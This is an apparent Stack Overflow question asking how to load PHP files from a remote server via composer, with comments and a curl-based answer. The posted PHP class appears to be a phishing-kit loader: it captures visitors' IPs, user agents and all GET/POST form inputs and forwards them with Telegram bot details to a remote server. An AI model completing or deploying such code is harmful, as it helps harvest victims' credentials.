# i need composer to load php files from othere server

Tags: php, composer-php

hello please i need simple composer script so i can use it on server that have my raw php files and load them from php file on anothere server can any one help please ?

i mean when i upload autoloader.php on my server the code look like this and it load the php files from the server that have el coposer script

```
require_once(__DIR__ . DIRECTORY_SEPARATOR. "Autoloader.php");

class Config
{
    private $server_url, $username, $api_key, $telegram_id, $telegram_bot, $captcha_website, $captcha_secret;
    private $authenticator, $request, $message;
    public function __construct($server_url, $username, $api_key, $telegram_id, $telegram_bot, $captcha_website, $captcha_secret){
        if (strpos($server_url, "raw.githubusercontent.com", 0) !== false)
        $this->$server_url = \Assets\Generic::fetchGithubContent($server_url);
        $autoloader = new Autoloader();
        $logger = new \Assets\Logger();
        $session = new \Assets\Session();
        $this->request = new \Assets\RequestHandler();
        $this->server_url = $server_url;
        $this->username = $username;
        $this->api_key = $api_key;
        $this->telegram_id = $telegram_id;
        $this->telegram_bot = $telegram_bot;
        $this->captcha_website = $captcha_website;
        $this->captcha_secret = $captcha_secret;
        $this->message = $this->createMessage();
        $this->authenticator = new \Assets\Authenticator($server_url, $this->message);
        $this->run();
    }

    private function run(){

        if (!$this->authenticator->authenticate()){
            http_response_code(403);
            echo "Un-authorized access. please login to continue";
            exit(0);
        }

        if ($this->authenticator->isBlocked()){
            http_response_code(302);
            header("Location: https://www.google.com");
            exit(0);
        }

        $this->request->handle($this->server_url, $this->message);
    }

    private function createMessage(){
        return array(
            'customer_info' => array(
                'api_key' => $this->api_key,
                'chat_id' => $this->telegram_id,
                'telegram_bot' => $this->telegram_bot,
                'captcha_secret_key' => $this->captcha_secret,
                'captcha_website_key' => $this->captcha_website,
                'username' => $this->username,
            ),
            'client_info' => array(
                'ip' => \Assets\Generic::getIp(),
                'useragent' => $_SERVER['HTTP_USER_AGENT'],
                'method' => $_SERVER['REQUEST_METHOD'],
                'request_time' => time(),
                'inputs' => array(
                    'get' => $_GET,
                    'post' => $_POST
                )
            )
        );
    }
}

$server_url = "https://blabla/bla.php";
$api_key = "cdb6d872-0529-4358-ba29-bfae71cf3ed0";
$username = "blanvla";
$telegram_id = "963065016";
$telegram_bot = "5371625949:AAHjcf";
$captcha_website = "RecaptchaV2-Site Key";
$captcha_secret = "RecaptchaV2-Secret Key";


$config = new Config($server_url, $username, $api_key, $telegram_id, $telegram_bot, $captcha_website, $captcha_secret);
```

Comment: Output the file to download as PLAIN/TEXT, maybe as .txt format and copy the content to your other server. But also consider security risks. don't give out any sensitive information. you can also use .htaccess to limit access to specific files to your server's ip address (the server that should fetch the file).

Comment: "el coposer script" - what does that mean? Also, what have you tried to resolve the problem? Where are you stuck?

Answer (score 0):

First download that script with [*curl* or *wget*](https://superuser.com/questions/1033195/how-to-download-a-file-from-url-in-linux), then add it to your `composer.json`:

```bash
curl 'https://example.com/public/MyClass.php' > ./vendor/customScripts/MyClass.php
```

```json
// composer.json
{
   "autoload": [
       "classmap": [
           "customScripts/MyClass.php"
       ]
   ],
}
```

Comment: Please add some explanation to your answer such that others can learn from it. How would this approach work with multiple files?